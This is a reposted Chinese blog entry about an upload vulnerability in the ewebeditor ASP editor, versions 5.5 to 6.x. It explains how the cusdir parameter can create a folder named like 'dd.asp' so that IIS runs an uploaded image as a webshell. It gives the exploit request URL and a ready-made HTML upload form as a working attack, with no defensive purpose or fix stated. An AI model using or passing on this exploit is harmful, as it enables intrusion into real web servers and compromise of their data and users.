ewebeditor asp版5.5-6.X解析漏洞0day

ewebeditor asp版5.5-6.X解析漏洞0day

精选 转载

点点7788 博主文章分类:漏洞

文章标签 入侵 数据库 账号 配置文件 影响 文章分类 网络安全

影响版本:ewebeditor5.5版,对6.X以上版本也管用,对ASP。aspx。JSP。均管用。

转载地址:http://www.chouwazi.com/article.asp?id=301

ewebeditor5.5版没有mdb数据库,账号和密码存在配置文件

漏洞描述:利用IIS的解析漏洞建立一个XX.asp的文件夹,上传jpg拿webshell

1.   http://www.xxx.net/ewebeditor/asp/upload.asp?action=save&type=p_w_picpath&style=popup&cusdir=dd.asp

 

 

 

可以建立一个a.asp文件夹

 

或者直接用html上传

<form action="http://www.XXX.com/ewebeditor/asp/upload.asp?action=save&type=p_w_picpath&style=popup&cusdir=dd.asp" method=

post name=myform enctype="multipart/form-data">

<input type=file name=uploadfile size=100><br><br>

<input type=submit value=upload>

</form>

 

  • 收藏
  • 评论
  • 举报
提问和评论都可以,用心的回复会被更多人看到 评论
发布评论
相关文章

举报文章

请选择举报类型

内容侵权 涉嫌营销 内容抄袭 违法信息 其他

具体原因

包含不真实信息 涉及个人隐私

补充说明

0/200

上传截图

格式支持JPEG/PNG/JPG,图片不超过1.9M

已经收到您得举报信息,我们会尽快审核